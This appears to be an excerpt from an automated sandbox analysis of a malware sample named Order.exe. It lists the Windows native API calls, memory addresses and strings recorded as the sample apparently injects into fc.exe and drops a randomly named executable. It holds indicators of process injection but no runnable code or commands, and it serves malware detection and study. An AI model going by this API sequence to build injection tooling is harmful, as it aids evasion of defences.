                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A02E80 NtReadVirtualMemory
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A02EE0 NtQueueApcThread
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A02E30 NtWriteVirtualMemory
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A03090 NtSetValueKey
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A03010 NtOpenDirectoryObject
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A039B0 NtGetContextThread
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A03D10 NtOpenProcessToken
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A03D70 NtOpenThread
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03934340 NtSetContextThread, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03934650 NtSuspendThread, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03932BA0 NtEnumerateValueKey, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03932BF0 NtAllocateVirtualMemory, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03932BE0 NtQueryValueKey, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03932B60 NtClose, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03932AD0 NtReadFile, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03932AF0 NtWriteFile, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03932FB0 NtResumeThread, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03932FE0 NtCreateFile, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03932F30 NtCreateSection, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03932E80 NtReadVirtualMemory, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03932EE0 NtQueueApcThread, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03932DD0 NtDelayExecution, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03932DF0 NtQuerySystemInformation, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03932D10 NtMapViewOfSection, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03932D30 NtUnmapViewOfSection, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03932CA0 NtQueryInformationToken, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03932C70 NtFreeVirtualMemory, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03932C60 NtCreateKey, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039335C0 NtCreateMutant, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039339B0 NtGetContextThread, LdrInitializeThunk
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03932B80 NtQueryInformationFile
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03932AB0 NtWaitForSingleObject
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03932F90 NtProtectVirtualMemory
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03932FA0 NtQuerySection
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03932F60 NtCreateProcessEx
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03932EA0 NtAdjustPrivilegesToken
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03932E30 NtWriteVirtualMemory
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03932DB0 NtEnumerateKey
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03932D00 NtSetInformationFile
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03932CC0 NtQueryVirtualMemory
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03932CF0 NtOpenProcess
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03932C00 NtQueryInformationProcess
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03933090 NtSetValueKey
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03933010 NtOpenDirectoryObject
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03933D10 NtOpenProcessToken
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03933D70 NtOpenThread
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03229300 NtClose
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03229260 NtDeleteFile
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03229170 NtReadFile
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03229000 NtCreateFile
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03229460 NtAllocateVirtualMemory
                Source: C:\Users\user\Desktop\Order.exe | Code function: 0_2_00EBD384
                Source: C:\Users\user\Desktop\Order.exe | Code function: 0_2_06D02288
                Source: C:\Users\user\Desktop\Order.exe | Code function: 0_2_06D02278
                Source: C:\Users\user\Desktop\Order.exe | Code function: 0_2_06D0D238
                Source: C:\Users\user\Desktop\Order.exe | Code function: 0_2_06D0D228
                Source: C:\Users\user\Desktop\Order.exe | Code function: 0_2_06D0B038
                Source: C:\Users\user\Desktop\Order.exe | Code function: 0_2_06D0CE00
                Source: C:\Users\user\Desktop\Order.exe | Code function: 0_2_06D0AC00
                Source: C:\Users\user\Desktop\Order.exe | Code function: 0_2_06D0CDF0
                Source: C:\Users\user\Desktop\Order.exe | Code function: 0_2_07090940
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_00418613
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_00416843
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_0041683F
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_004100F3
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_004028A0
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_004030B0
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_0040E173
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_0040E43E
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_0042ECA3
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_0040FED3
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_004046D4
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A901AA
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A841A2
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A881CC
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_019C0100
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A6A118
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A58158
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A62000
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A903E6
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_019DE3F0
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A8A352
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A502C0
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A70274
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A90591
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_019D0535
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A7E4F6
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A74420
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A82446
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_019CC7C0
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_019F4750
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_019D0770
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_019EC6E0
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A9A9A6
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_019D29A0
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_019E6962
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_019B68B8
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_019FE8F0
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_019DA840
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_019D2840
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A86BD7
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A8AB40
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_019CEA80
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_019E8DBF
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_019CADE0
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_019DAD00
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A6CD1F
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A70CB5
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_019C0CF2
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_019D0C00
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A4EFA0
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_019C2FC8
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_019DCFE0
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A12F28
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A72F30
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_019F0F30
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A44F40
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_019E2E90
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A8CE939_2_01A8CE93
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A8EEDB9_2_01A8EEDB
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A8EE269_2_01A8EE26
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D0E599_2_019D0E59
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019DB1B09_2_019DB1B0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A9B16B9_2_01A9B16B
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A0516C9_2_01A0516C
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019BF1729_2_019BF172
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A870E99_2_01A870E9
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A8F0E09_2_01A8F0E0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D70C09_2_019D70C0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A7F0CC9_2_01A7F0CC
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A1739A9_2_01A1739A
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A8132D9_2_01A8132D
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019BD34C9_2_019BD34C
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D52A09_2_019D52A0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A712ED9_2_01A712ED
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019EB2C09_2_019EB2C0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6D5B09_2_01A6D5B0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A995C39_2_01A995C3
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A875719_2_01A87571
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A8F43F9_2_01A8F43F
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019C14609_2_019C1460
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A8F7B09_2_01A8F7B0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A816CC9_2_01A816CC
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A156309_2_01A15630
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A659109_2_01A65910
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D99509_2_019D9950
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019EB9509_2_019EB950
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D38E09_2_019D38E0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A3D8009_2_01A3D800
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019EFB809_2_019EFB80
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A45BF09_2_01A45BF0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A0DBF99_2_01A0DBF9
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A8FB769_2_01A8FB76
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A15AA09_2_01A15AA0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A71AA39_2_01A71AA3
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A6DAAC9_2_01A6DAAC
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A7DAC69_2_01A7DAC6
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A43A6C9_2_01A43A6C
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A8FA499_2_01A8FA49
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A87A469_2_01A87A46
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019EFDC09_2_019EFDC0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A87D739_2_01A87D73
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D3D409_2_019D3D40
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A81D5A9_2_01A81D5A
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A8FCF29_2_01A8FCF2
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A49C329_2_01A49C32
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D1F929_2_019D1F92
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A8FFB19_2_01A8FFB1
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01993FD29_2_01993FD2
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01993FD59_2_01993FD5
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A8FF099_2_01A8FF09
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_019D9EB09_2_019D9EB0
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | Code function: 11_2_00A3F9DB
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | Code function: 11_2_00A341DC
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | Code function: 11_2_00A4811B
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | Code function: 11_2_00A44A8B
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | Code function: 11_2_00A3FBFB
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | Code function: 11_2_00A46347
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | Code function: 11_2_00A4634B
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | Code function: 11_2_00A3DC7B
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | Code function: 11_2_00A5E7AB
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | Code function: 11_2_00A3DF46
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | Code function: 11_2_039C1332
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | Code function: 11_2_039C3301
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | Code function: 11_2_039C9A51
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | Code function: 11_2_039C9A4D
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | Code function: 11_2_039B78E2
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | Code function: 11_2_039C30E1
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | Code function: 11_2_039E1EB1
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_0390E3F0
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039C03E6
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039BA352
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039802C0
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039A0274
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039C01AA
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039B41A2
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039B81CC
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_0399A118
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_038F0100
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03988158
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03992000
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_038FC7C0
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03924750
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03900770
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_0391C6E0
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039C0591
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03900535
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039AE4F6
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039A4420
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039B2446
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039B6BD7
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039BAB40
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_038FEA80
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039029A0
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039CA9A6
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03916962
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_038E68B8
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_0392E8F0
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_0390A840
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03902840
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_0397EFA0
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_038F2FC8
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_0390CFE0
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03920F30
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039A2F30
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03942F28
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03974F40
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03912E90
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039BCE93
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039BEEDB
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039BEE26
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03900E59
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03918DBF
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_038FADE0
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_0399CD1F
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_0390AD00
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039A0CB5
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_038F0CF2
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03900C00
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_0394739A
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039B132D
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_038ED34C
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039052A0
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_0391B2C0
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039A12ED
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_0390B1B0
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039CB16B
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_038EF172
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_0393516C
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039070C0
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039AF0CC
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039B70E9
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039BF0E0
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039BF7B0
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039B16CC
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03945630
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_0399D5B0
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039C95C3
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039B7571
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039BF43F
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_038F1460
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_0391FB80
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03975BF0
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_0393DBF9
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039BFB76
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03945AA0
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_0399DAAC
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039A1AA3
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039ADAC6
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039BFA49
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039B7A46
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03973A6C
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03995910
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03909950
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_0391B950
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039038E0
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_0396D800
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03901F92
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039BFFB1
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_038C3FD5
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_038C3FD2
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039BFF09
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03909EB0
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_0391FDC0
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039B1D5A
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03903D40
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039B7D73
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_039BFCF2
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03979C32
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03211C50
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_0320CBA0
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_0320AE40
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_0320CDC0
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_032013A1
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_032152E0
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_0320B10B
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_0321350C
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03213510
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_0322B970
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03C1038F
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03C1E2BB
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03C1E153
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03C1E038
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03C1D5B8
                Source: C:\Windows\SysWOW64\fc.exe | Code function: 12_2_03C1E4EC
                Source: C:\Windows\SysWOW64\fc.exe | Code function: String function: 0397F290 appears 105 times
                Source: C:\Windows\SysWOW64\fc.exe | Code function: String function: 038EB970 appears 277 times
                Source: C:\Windows\SysWOW64\fc.exe | Code function: String function: 03947E54 appears 111 times
                Source: C:\Windows\SysWOW64\fc.exe | Code function: String function: 0396EA12 appears 86 times
                Source: C:\Windows\SysWOW64\fc.exe | Code function: String function: 03935130 appears 58 times
                Source: C:\Users\user\Desktop\Order.exe | Code function: String function: 01A3EA12 appears 86 times
                Source: C:\Users\user\Desktop\Order.exe | Code function: String function: 01A05130 appears 58 times
                Source: C:\Users\user\Desktop\Order.exe | Code function: String function: 01A17E54 appears 111 times
                Source: C:\Users\user\Desktop\Order.exe | Code function: String function: 019BB970 appears 277 times
                Source: C:\Users\user\Desktop\Order.exe | Code function: String function: 01A4F290 appears 105 times
                Source: Order.exe, 00000000.00000002.1423090538.0000000005310000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs Order.exe
                Source: Order.exe, 00000000.00000002.1407556372.000000000095E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Order.exe
                Source: Order.exe, 00000000.00000002.1420057586.0000000002871000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs Order.exe
                Source: Order.exe, 00000000.00000002.1424310251.00000000070A0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs Order.exe
                Source: Order.exe, 00000009.00000002.1782237155.0000000001468000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameFC.EXEj% vs Order.exe
                Source: Order.exe, 00000009.00000002.1782237155.000000000147C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameFC.EXEj% vs Order.exe
